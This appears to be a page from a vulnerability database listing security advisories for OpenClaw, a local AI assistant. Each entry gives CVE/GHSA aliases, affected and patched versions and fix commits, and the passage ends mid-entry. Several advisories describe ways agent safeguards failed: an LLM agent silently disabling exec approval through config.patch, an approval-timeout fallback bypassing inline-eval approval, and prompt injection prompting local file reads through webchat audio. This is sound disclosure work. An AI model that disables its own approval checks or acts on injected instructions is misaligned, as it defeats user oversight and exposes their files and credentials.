OpenClaw: Agentic Consent Bypass — LLM Agent Can Silently Disable Exec Approval via `config.patch` ## Summary Agentic Consent Bypass: LLM Agent Can Silently Disable Exec Approval via `config.patch` ## Current Maintainer Triage - Status: open - Normalized severity: high - Assessment: Maintainers accepted this issue, fixed it in 76411b2afc4ae721e36c12e0ea24fd23e2fed61e on 2026-03-27, and that fix shipped in v2026.3.28, so normalize it as a fixed released draft rather than a close-by-trust-model call. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.24` - Patched versions: `>= 2026.3.28` - First stable tag containing the fix: `v2026.3.28` ## Fix Commit(s) - `76411b2afc4ae721e36c12e0ea24fd23e2fed61e` — 2026-03-27T09:42:15Z OpenClaw thanks @YLChen-007 for reporting. |
Affected by 150 other vulnerabilities. |
|
VCID-axp9-mt9z-gkgw
Aliases: CVE-2026-41374 GHSA-hhff-fj5f-qg48 |
OpenClaw runs Discord audio preflight transcription before member authorization ## Summary Discord audio preflight transcription before member authorization ## Current Maintainer Triage - Status: narrow - Normalized severity: medium - Assessment: v2026.3.28 still runs Discord audio preflight before member allowlist rejection, but this is the same pre-auth resource-consumption class and not the high-severity auth-bypass framing in the draft. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `ee52f64226a03efadfdf1e3b759e13424a3d4e41` — 2026-03-30T14:38:22+01:00 OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-aye6-1fwu-nkc5
Aliases: GHSA-g86v-f9qv-rh6m |
OpenClaw SSRF guard misses four IPv6 special-use ranges ## Summary The SSRF/IP classifier treated several IPv6 special-use ranges as public and allowed fetches to proceed. ## Impact An attacker who controlled a fetched URL could target internal or non-routable IPv6 addresses that should have been blocked by the SSRF guard. ## Affected Component `src/shared/net/ip.ts, src/infra/net/ssrf.*` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `d61f8e5672` (`Net: block missing IPv6 special-use ranges`). OpenClaw thanks @nicky-cc of Tencent zhuque Lab [https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard) for reporting. |
Affected by 150 other vulnerabilities. |
|
VCID-b9w3-w2nq-cqg6
Aliases: CVE-2026-41404 GHSA-g374-mggx-p6xc |
OpenClaw: Incomplete scope-clearing fix allows operator.admin escalation via trusted-proxy auth mode ## Summary Incomplete scope-clearing fix allows operator.admin escalation via trusted-proxy auth mode ## Current Maintainer Triage - Normalized severity: high - Assessment: v2026.3.28 still misses trusted-proxy scope clearing for non-Control-UI clients, so self-declared operator scopes can survive on a real identity-bearing auth path; the complete fix is unreleased. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `8b88b927cb0747ad24d95b07d35682bf85dc5b0e` — 2026-03-30T14:19:00+01:00 OpenClaw thanks @north-echo for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-bg1d-gmxy-wkc6
Aliases: CVE-2026-41332 GHSA-m866-6qv5-p2fg |
OpenClaw host-env blocklist missing `GIT_TEMPLATE_DIR` and `AWS_CONFIG_FILE` allows code execution via env override ## Summary Host execution env sanitization did not block `GIT_TEMPLATE_DIR` or `AWS_CONFIG_FILE`, even though both can redirect trusted tooling to attacker-controlled content. ## Impact An approved exec request could redirect git or AWS CLI behavior through attacker-controlled configuration and execute untrusted code or load attacker-selected credentials. ## Affected Component `src/infra/host-env-security-policy.json, src/infra/host-env-security.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `6eb82fba3c` (`Infra: block additional host exec env keys`). OpenClaw thanks @nicky-cc of Tencent zhuque Lab [https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard) for reporting. |
Affected by 150 other vulnerabilities. |
|
VCID-bgwh-spue-yybk
Aliases: CVE-2026-34511 GHSA-9jpj-g8vv-j5mf |
OpenClaw: Gemini OAuth exposed the PKCE verifier through the OAuth state parameter ## Summary Before OpenClaw 2026.4.2, the Gemini OAuth flow reused the PKCE verifier as the OAuth `state` value. Because the provider reflected `state` back in the redirect URL, the verifier could be exposed alongside the authorization code. ## Impact Anyone who could capture the redirect URL could learn both the authorization code and the PKCE verifier, defeating PKCE's interception protection for that flow and enabling token redemption. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `>= 2026.4.2` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `a26f4d0f3ef0757db6c6c40277cc06a5de76c52f` — separate OAuth state from the PKCE verifier OpenClaw thanks @BG0ECV for reporting. |
Affected by 80 other vulnerabilities. |
|
VCID-bk76-1ctt-tkaw
Aliases: GHSA-35cq-wv6v-88xf |
Duplicate Advisory: OpenClaw affected by SSRF via unguarded image download in fal provider ### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-qxgf-hmcj-3xw3. This link is maintained to preserve external references. ### Original Description OpenClaw before 2026.3.28 contains a server-side request forgery vulnerability in the fal provider image-generation-provider.ts component that allows attackers to fetch internal URLs. A malicious or compromised fal relay can exploit unguarded image download fetches to expose internal service metadata and responses through the image pipeline. |
Affected by 150 other vulnerabilities. |
|
VCID-bkya-73v8-bber
Aliases: CVE-2026-42423 GHSA-q2gc-xjqw-qp89 |
OpenClaw: strictInlineEval explicit-approval boundary bypassed by approval-timeout fallback on gateway and node exec hosts ## Impact strictInlineEval explicit-approval boundary bypassed by approval-timeout fallback on gateway and node exec hosts. The approval-timeout fallback could allow inline eval commands that strictInlineEval was meant to require explicit approval for. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<=2026.4.2` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @zsxsoft and @KeenSecurityLab for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-bnfh-rsk9-cfea
Aliases: CVE-2026-35651 GHSA-4hmj-39m8-jwc7 |
OpenClaw has ACP CLI approval prompt ANSI escape sequence injection ## Summary ACP CLI approval prompt ANSI escape sequence injection ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `>= 2026.2.13, <= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details ACP tool titles could previously carry ANSI control sequences into approval prompts and permission logs, letting untrusted tool metadata spoof terminal output. Commit `464e2c10a5edceb380d815adb6ff56e1a4c50f60` sanitizes tool titles at the source and broadens ANSI stripping to full CSI sequences. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `464e2c10a5edceb380d815adb6ff56e1a4c50f60`. ## Fix Commit(s) - `464e2c10a5edceb380d815adb6ff56e1a4c50f60` |
Affected by 150 other vulnerabilities. |
|
VCID-bzw7-yvu2-yqa2
Aliases: CVE-2026-41395 GHSA-8689-gm9g-jgr6 |
OpenClaw: Voice-call Plivo V3 webhook replay key uses unsorted URL, allowing replay via query-parameter reordering ## Summary Plivo V3 signature verification canonicalized query ordering, but replay detection hashed the raw verification URL. Reordering query parameters preserved a valid signature while producing a fresh replay-cache key. ## Impact An attacker who captured one valid signed Plivo V3 webhook could replay the same event by permuting query parameters and trigger duplicate voice-call processing. ## Affected Component `extensions/voice-call/src/webhook-security.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `85777e726c` (`Voice Call: canonicalize Plivo V3 replay key`). |
Affected by 150 other vulnerabilities. |
|
VCID-c25h-khws-2fc3
Aliases: GHSA-f3h5-h452-vp3j |
OpenClaw: Nostr profile mutation routes allowed operator.write config persistence ## Summary Nostr profile mutation routes allowed operator.write config persistence. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.10` - Patched versions: `>= 2026.4.10` ## Impact Nostr plugin HTTP profile routes could persist profile config through a path that did not require admin authority. ## Technical Details The fix requires `operator.admin` scope for Nostr profile mutation routes. ## Fix The issue was fixed in #63553. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `6517c700de9bb0ee11b41ab625ef3b63d01b6083` - PR: #63553 ## Release Process Note Users should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zpbrent and @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue. |
Affected by 42 other vulnerabilities. |
|
VCID-c4yt-z48z-zygv
Aliases: CVE-2026-41341 GHSA-6336-qqw9-v6x6 |
OpenClaw: Discord Component Interaction Misclassifies Group DM as Direct Message ## Summary Discord Component Interaction Misclassifies Group DM as Direct Message ## Current Maintainer Triage - Status: narrow - Normalized severity: low - Assessment: Real on shipped v2026.3.24 component-interaction routing/auth in extensions/discord/src/monitor/agent-components-helpers.ts, but impact is limited to Group DM policy or session misclassification. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `8c83128fc38d5a3642b8ccbea58550755fdbbbaf` — 2026-03-30T11:17:53-06:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @nexrin for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-c76v-4577-n7c6
Aliases: CVE-2026-41335 GHSA-hr8g-2q7x-3f4w |
OpenClaw Has a Gateway Control Interface Information Disclosure Vulnerability ## Summary OpenClaw Gateway Control Interface Information Disclosure Vulnerability ## Current Maintainer Triage - Status: narrow - Normalized severity: low - Assessment: Released Control UI bootstrap JSON did expose version and assistant agent id, but that is low-severity fingerprinting or info disclosure only; unreleased c5c10adc trims the payload. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `c5c10adc022f42eb75ebb3bf364dd607738683b3` — 2026-03-30T15:08:19+01:00 OpenClaw thanks @topsec-bunney for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-carm-gpgh-wbbf
Aliases: CVE-2026-41364 GHSA-fv94-qvg8-xqpw |
OpenClaw: SSH sandbox tar upload follows symlinks, enabling arbitrary file write on remote host ## Summary SSH sandbox tar upload follows symlinks, enabling arbitrary file write on remote host ## Current Maintainer Triage - Status: open - Normalized severity: high - Assessment: Real in shipped v2026.3.28: SSH sandbox tar upload lacked pre-upload symlink escape rejection until 3d5af14984 on 2026-03-31; maintainers already accepted it and the fix is unreleased. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `3d5af14984ac1976c747a8e11581d697bd0829dc` — 2026-03-31T19:56:45+09:00 OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-cbuu-4d6c-rben
Aliases: CVE-2026-42428 GHSA-3vvq-q2qc-7rmp |
OpenClaw B-M3: ClawHub package downloads are not enforced with integrity verification ## Impact B-M3: ClawHub package downloads are not enforced with integrity verification. ClawHub downloads could install plugin archives without enforcing archive or per-file integrity metadata. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @kexinoh of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-csnc-r6fv-j3en
Aliases: GHSA-jp4j-q5fc-58gv |
OpenClaw's Discord component interaction ingress skips guild/channel policy enforcement ## Summary Discord button and component interaction ingress did not consistently reapply the same guild and channel policy gates used for normal inbound messages. ## Impact Users could trigger privileged component actions from contexts that should have been blocked by Discord channel policy. ## Affected Component `extensions/discord/src/monitor/agent-components.ts` ## Fixed Versions - Affected: `>= 2026.2.14, <= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `511093d4b3` (`Discord: apply component interaction policy gates`). |
Affected by 150 other vulnerabilities. |
|
VCID-cvmw-sxfq-dyhz
Aliases: CVE-2026-41346 GHSA-wwfp-w96m-c6x8 |
OpenClaw: Pairing pending-request caps were enforced per channel instead of per account ## Summary Before OpenClaw 2026.3.31, pending pairing-request caps were enforced per channel file instead of per account. On multi-account channel setups, requests from other accounts could fill the shared pending window and block new pairing challenges on an unaffected account. ## Impact This issue could deny new pairing or onboarding on another account until an existing request was approved or expired. It was an availability-only bug; it did not allow cross-account approval, data access, or authorization bypass. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `>= 2026.2.26, < 2026.3.31` - Patched versions: `>= 2026.3.31` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `9bc1f896c8cd325dd4761681e9bdb8c425f69785` — scope pending request caps per account ## Release Process Note The fix shipped in OpenClaw `2026.3.31` on March 31, 2026. The current published npm release `2026.4.1` from April 1, 2026 also contains the fix. Thanks @smaeljaish771 for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-cwd3-ecym-sfaw
Aliases: CVE-2026-35645 GHSA-h4jx-hjr3-fhgc |
OpenClaw: Gateway Plugin Subagent Fallback `deleteSession` Uses Synthetic `operator.admin` ## Summary Gateway Plugin Subagent Fallback `deleteSession` Uses Synthetic `operator.admin` ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details Gateway plugin subagent fallback `deleteSession` previously dispatched `sessions.delete` with a synthetic `operator.admin` runtime scope when no request-scoped client existed. Commit `b5d785f1a59a56c3471f2cef328f7c9a6c15f3e7` binds deletion to the caller scope instead of minting admin scope. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `b5d785f1a59a56c3471f2cef328f7c9a6c15f3e7`. ## Fix Commit(s) - `b5d785f1a59a56c3471f2cef328f7c9a6c15f3e7` |
Affected by 150 other vulnerabilities. |
|
VCID-d864-qy75-c3dx
Aliases: CVE-2026-35664 GHSA-77w2-crqv-cmv3 |
OpenClaw: Feishu Raw Card Send Surface Can Mint Legacy Card Callbacks That Bypass DM Pairing ## Summary Feishu Raw Card Send Surface Can Mint Legacy Card Callbacks That Bypass DM Pairing ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details Feishu raw card sends could previously mint legacy callback payloads that bypassed DM pairing and let unpaired recipients reach callback handling. Commit `81c45976db532324b5a0918a70decc19520dc354` rejects legacy raw-card command payloads so callbacks stay on the normal paired path. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `81c45976db532324b5a0918a70decc19520dc354`. ## Fix Commit(s) - `81c45976db532324b5a0918a70decc19520dc354` |
Affected by 150 other vulnerabilities. |
|
VCID-d8v2-gft5-buee
Aliases: CVE-2026-41354 GHSA-rxmx-g7hr-8mx4 |
OpenClaw: Zalo replay dedupe keys could suppress messages across chats or senders ## Summary Before OpenClaw 2026.4.2, Zalo webhook replay dedupe keys were not scoped strongly enough across chat and sender dimensions. Legitimate events from different conversations or senders could collide and be dropped as duplicates. ## Impact Cross-conversation or cross-sender collisions could cause silent message suppression and break bot workflows. This was an availability issue in webhook event processing. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `>= 2026.4.2` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `ef7c553dd16ee579f1d1a363f5881a99726c1412` — scope Zalo webhook replay dedupe across the missing event dimensions ## Release Process Note The fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live. Thanks @D0ub1e-D for reporting. |
Affected by 80 other vulnerabilities. |
|
VCID-da47-zdf1-mfgf
Aliases: CVE-2026-41385 GHSA-jjw7-3vjf-fg5j |
## Summary OpenClaw Nostr privateKey config redaction bypass leaks plaintext signing key via config.get ## Current Maintainer Triage - Status: open - Normalized severity: medium - Assessment: v2026.3.28 still models Nostr privateKey as plain string so config views can expose it, and the secret-schema fix is unreleased. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `57700d716f660591fb6e09727f3ca8041fa48b9d` — 2026-03-31T19:55:03+09:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @ccreater222 for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-dbcw-brhj-k7hs
Aliases: CVE-2026-35646 GHSA-mf5g-6r6f-ghhm |
OpenClaw: Synology Chat Webhook Pre-Auth Rate-Limit Bypass Enables Brute-Force Guessing of Webhook Token ## Summary Synology Chat Webhook Pre-Auth Rate-Limit Bypass Enables Brute-Force Guessing of Weak Webhook Token ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details Synology Chat webhook auth previously rejected invalid tokens without throttling repeated guesses, allowing brute-force attempts against weak webhook secrets. Commit `0b4d07337467f4d40a0cc1ced83d45ceaec0863c` adds repeated-guess throttling before auth failure responses. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `0b4d07337467f4d40a0cc1ced83d45ceaec0863c`. ## Fix Commit(s) - `0b4d07337467f4d40a0cc1ced83d45ceaec0863c` |
Affected by 150 other vulnerabilities. |
|
VCID-dfdk-dhwf-9yaj
Aliases: CVE-2026-43528 GHSA-8372-7vhw-cm6q |
OpenClaw: config.get redaction bypass through sourceConfig and runtimeConfig aliases ## Summary config.get redaction bypass through sourceConfig and runtimeConfig aliases. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.14` - Patched versions: `>= 2026.4.14` ## Impact An authenticated gateway client with config read access could receive unredacted secrets through alias fields that survived redaction, including provider API keys, gateway auth material, and channel credentials. ## Technical Details The fix explicitly overwrites `sourceConfig` and `runtimeConfig` with the same redacted copies used for `resolved` and `config`, including the invalid-snapshot branch. Tests now cover both alias fields. ## Fix The issue was fixed in #66030. The first stable tag containing the fix is `v2026.4.14`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `86734ef93a2f25063371b04f1946eb300548acd4` - PR: #66030 ## Release Process Note Users should upgrade to `openclaw` 2026.4.14 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue. |
Affected by 30 other vulnerabilities. |
|
VCID-djqx-bwuu-4uc1
Aliases: CVE-2026-35628 GHSA-vcx4-4qxg-mfp4 |
OpenClaw: Telegram Webhook Missing Guess Rate Limiting Enables Brute-Force Guessing of Weak Webhook Secret ## Summary Telegram Webhook Missing Guess Rate Limiting Enables Brute-Force Guessing of Weak Webhook Secret ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details Telegram webhook auth previously rejected bad secrets but did not throttle repeated guesses, allowing brute-force attempts against weak webhook secrets. Commit `c2c136ae9517ddd0789d742a0fdf4c10e8c729a7` adds repeated-guess throttling before auth failure responses. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `c2c136ae9517ddd0789d742a0fdf4c10e8c729a7`. ## Fix Commit(s) - `c2c136ae9517ddd0789d742a0fdf4c10e8c729a7` ## Release Process Note `2026.3.25` is the next planned OpenClaw release version in `package.json`. This advisory is being published ahead of that npm release so the draft is no longer blocked; once `2026.3.25` is published, the structured patched-version metadata will match the released artifact. | There are no reported fixed by versions. |
|
VCID-dmse-bb22-rkcj
Aliases: GHSA-jf56-mccx-5f3f |
OpenClaw: Authenticated `/hooks/wake` and mapped `wake` payloads are promoted into the trusted `System:` prompt channel ## Impact Authenticated `/hooks/wake` and mapped `wake` payloads are promoted into the trusted `System:` prompt channel. An authenticated wake hook or mapped wake payload could be promoted into the trusted System prompt channel instead of an untrusted event. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.2` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @tdjackey for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-dv5s-pvw1-a7fu
Aliases: CVE-2026-45004 GHSA-r39h-4c2p-3jxp |
OpenClaw vulnerable to arbitrary code execution via attacker-controlled setup-api.js loaded from cwd during env-key resolution ## Summary OpenClaw's bundled plugin setup resolver could fall back to `process.cwd()` while resolving provider setup metadata. If a user ran an OpenClaw command from an attacker-controlled repository containing `extensions/<plugin>/setup-api.js`, OpenClaw could load and execute that JavaScript during ordinary provider/model status resolution. ## Impact This is arbitrary JavaScript execution in the OpenClaw process under the current user account. A malicious repository could run code when the user executed commands such as provider/model inspection from that directory. The issue does not require gateway network exposure, but it does require user interaction: the user must run OpenClaw from a directory containing the attacker-controlled setup file. ## Affected Packages / Versions - Package: `openclaw` on npm - Affected: versions before `2026.4.23` - Fixed: `2026.4.23` - Latest stable verified fixed: `openclaw@2026.4.23`, tag `v2026.4.23` ## Fix OpenClaw now resolves bundled setup fallbacks only from the canonical package/repository root and no longer includes `process.cwd()` as a trusted setup-api search root. A regression test verifies that a workspace-local `extensions/<plugin>/setup-api.js` is not loaded through provider setup resolution. ## Fix Commit(s) - `993781e6e6eaf50f033cfc3e3bf4f47059740707` (`fix(plugins): ignore cwd setup-api fallback`) ## Severity Severity remains `high` because successful exploitation allows arbitrary code execution under the user running OpenClaw. The CVSS vector is local/user-interaction scoped rather than network-only because the victim must run OpenClaw from an attacker-controlled directory. |
Affected by 0 other vulnerabilities. |
|
VCID-e25p-j5ed-yqfz
Aliases: GHSA-93rg-2xm5-2p9v |
OpenClaw's Gateway Control UI bootstrap config required Gateway auth ## Summary Gateway Control UI bootstrap config required Gateway auth. ## Affected Packages / Versions - Package: openclaw (npm) - Affected versions: <= 2026.4.21 - Fixed version: 2026.4.22 ## Impact When Gateway authentication was enabled, the Control UI bootstrap config endpoint could still be read without a valid Gateway token. That response could expose sensitive bootstrap/config fields intended only for authenticated Control UI sessions. ## Fix The bootstrap config route now goes through the same Gateway read-auth path as other authenticated Control UI reads. Regression tests cover unauthenticated rejection, valid-token access, and basePath handling. ## Fix Commit(s) - 2321d67263bc710e357644d59f746b08d891051b ## Verification - The fix commit is contained in the public v2026.4.22 tag. - openclaw@2026.4.22 is published on npm and the compiled package contains the fix. - Focused regression coverage for this path passed before publication. OpenClaw thanks @zsxsoft for reporting. |
Affected by 3 other vulnerabilities. |
|
VCID-e4ac-qm17-qbf5
Aliases: GHSA-w9j9-w4cp-6wgr |
## Impact OpenClaw Host-Exec Environment Variable Injection. Host exec could inherit environment variables that influence interpreters, shells, or build tools. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.3.28` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @wsparks-vc for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-fekn-d6f3-xfa6
Aliases: CVE-2026-41347 GHSA-mhr7-2xmv-4c4q |
OpenClaw: HTTP operator endpoints lack browser-origin validation in trusted-proxy mode ## Summary HTTP operator endpoints lack browser-origin validation in trusted-proxy mode ## Current Maintainer Triage - Status: narrow - Normalized severity: medium - Assessment: This is a real trusted-proxy HTTP CSRF or browser-origin gap in released tags, but it is not critical because it depends on identity-bearing trusted-proxy browser deployments rather than the shared-secret HTTP operator model. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `6b3f99a11f4d070fa5ed2533abbb3d7329ea4f0d` — 2026-03-31T19:49:26+09:00 OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-fuda-zxu8-gbb4
Aliases: GHSA-525j-hqq2-66r4 |
OpenClaw: Sandbox browser CDP relay could expose DevTools protocol on 0.0.0.0 ## Summary Sandbox browser CDP relay could expose DevTools protocol on 0.0.0.0. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.10` - Patched versions: `>= 2026.4.10` ## Impact The sandbox browser CDP relay could bind too broadly, exposing Chrome DevTools Protocol access outside the intended local/sandbox source range. ## Technical Details The fix enforces CDP source-range restriction by default and avoids broad `0.0.0.0` exposure unless explicitly configured. ## Fix The issue was fixed in #61404. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `fbf11ebdb7110632f93926d0ac7b48f04cb44d77` - PR: #61404 ## Release Process Note Users should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue. |
Affected by 42 other vulnerabilities. |
|
VCID-g3hg-peh1-tudm
Aliases: CVE-2026-41393 GHSA-q9w8-cf67-r238 |
OpenClaw: macOS Tailnet DNS Spoofing & Credential Exfiltration ## Summary macOS Wide-Area Discovery Accepts Arbitrary Tailnet Peer as DNS Authority and Exfiltrates Operator Credentials ## Current Maintainer Triage - Status: narrow - Normalized severity: medium - Assessment: Real shipped macOS discovery steering bug, but exploitation needs same-tailnet position, a CA-trusted endpoint, and user selection, so medium not high. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `a23c33a681f8c1b22dc793995acc4c5c4b568346` — 2026-03-31T10:04:11+01:00 OpenClaw thanks @nexrin for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-g8r6-x6s5-uydq
Aliases: CVE-2026-41331 GHSA-m6fx-m8hc-572m |
OpenClaw: Telegram audio preflight transcription enables resource consumption by unauthorized senders ## Summary Telegram audio preflight transcription enables resource consumption by unauthorized senders ## Current Maintainer Triage - Status: narrow - Normalized severity: medium - Assessment: v2026.3.28 still lets unauthorized Telegram group senders trigger audio preflight before allowlist enforcement, but the real impact is resource or billing burn rather than direct data exposure or host compromise. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `c4fa8635d03943ffe9e294d501089521dca635c5` — 2026-03-30T12:19:31+01:00 OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-gk95-28x9-17dk
Aliases: GHSA-gfg9-5357-hv4c |
OpenClaw: Webchat audio embedding could read local files without local-root containment ## Impact OpenClaw deployments before `2026.4.15` could embed host-local audio files into webchat responses without applying the local media root containment check used by other media-serving paths. If an attacker could influence an agent or tool-produced `ReplyPayload.mediaUrl`, the webchat audio embedding helper could resolve an absolute local path or `file:` URL, read an audio-like file under the size cap, and base64-encode it into the webchat media response. This crossed the model/tool-output boundary into a host file read. Prompt injection or malicious tool output is a delivery mechanism; the security boundary failure is the missing local-root containment check. The impact is narrow: the file had to be readable by the gateway process, have an audio-like extension, and fit within the webchat audio size cap. The issue exposed contents into the webchat assistant/media transcript path; it was not a general remote filesystem API. ## Affected Packages / Versions - Package: `openclaw` on npm - Affected versions: `<= 2026.4.14` - Patched version: `2026.4.15` The latest public release, `2026.4.21`, also contains the fix. ## Patches The public fix threads the applicable local media roots into the webchat audio embedding path and calls `assertLocalMediaAllowed` before local audio content is read. Current `main` also includes an additional `trustedLocalMedia` gate so untrusted model/tool payloads cannot opt into local audio embedding. Fix commit: - `6e58f1f9f54bca1fea1268ec0ee4c01a2af03dde` ## 